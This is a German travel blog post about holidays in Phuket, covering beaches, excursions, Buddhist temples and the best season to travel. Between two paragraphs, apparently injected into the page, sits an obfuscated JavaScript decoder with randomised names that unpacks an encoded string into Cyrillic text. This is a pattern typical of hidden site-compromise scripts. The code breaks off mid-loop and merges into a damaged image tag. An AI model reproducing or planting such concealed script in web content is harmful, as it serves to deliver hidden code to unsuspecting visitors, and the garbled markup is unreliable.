Entdecke Asien – Urlaub in Phuket

Das Urlaubsparadies Phuket ist glücklicherweise nicht von der Unwetterkatastrophe betroffen. Hier können Urlauber die schönste Zeit des Jahres im Südwesten von Thailand in einzigartiger Atmosphäre verbringen. Kilometerlange, weiche und sandige Strände laden zu einem Badebesuch oder Spaziergang am warmen und kristallklaren Wasser ein. Doch auch zum Schnorcheln und Tauchen ist die Küste mit ihren Felsen und Buchten sowie Kalksteinfelsen ideal. Kamala Beach, Patong Beach und Karon Beach bilden dabei die wichtigsten touristischen Mittelpunkte.

Abenteuer in Phuket

Wer in Phuket etwas abenteuerliches erleben möchte, kann an Segeltouren, Safaris, Elefanten-Trekkings als auch Bambus-Raftings teilnehmen. Es werden aber auch weitere zahlreiche Aktivitäten wie Schifffahrten, Zoo- oder Theaterbesuche angeboten. Als besonderes Highlight gilt es für Urlauber in Phuket, sich auf einer Fahrt mit dem Kanu über die verschiedenen Seen und Flüsse die wunderbare Natur Phukets von einer ganz anderen Seite zu betrachten. Doch auch Erkundungstouren mit dem Boot oder auf einer gemieteten Yacht, entlang der wunderschönen Phang Nga-Bucht ist absolut lohnenswert. Die bemerkenswertesten Sehenswürdigkeiten sind aber wohl die umfangreichen buddhistischen Tempel aus vergangener Zeit. Der Wat Phra Nahng Sahng und Wat Chalong aber hauptsächlich der Pra Tong Tempel sind für die kostbaren goldenen Buddha weltbekannt.

function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand-300x168.jpg" alt="Phuket (Bild: Katharina Wieland Müller / pixelio.de)" title="thailand" width="300" height="168" class="size-medium wp-image-627" />

Beste Reisezeit Phuket

Phuket bietet nahezu das ganze Jahr Sonnenschein mit Temperaturen zwischen 25°C und 32°C. Am empfehlenswertesten für einen entspannenden Urlaub ist dabei die Zeit, in der bei uns in Deutschland der Winter auf der Tagesordnung steht. Dann ist das Klima in Phuket sehr angenehm, jedoch nicht zu drückend und heiß. In dieser Zeit herrscht meistens eine Trockenperiode, die am günstigsten für allerlei Aktivitäten ist. Häufig findet man auch noch unmittelbar vor Ort ein preiswertes Hotel in dem man gut überwintern kann.

Hinterlasse jetzt einen Kommentar

Kommentar hinterlassen

E-Mail Adresse wird nicht veröffentlicht.


*


This Blog will give regular Commentators DoFollow Status. Implemented from IT Blögg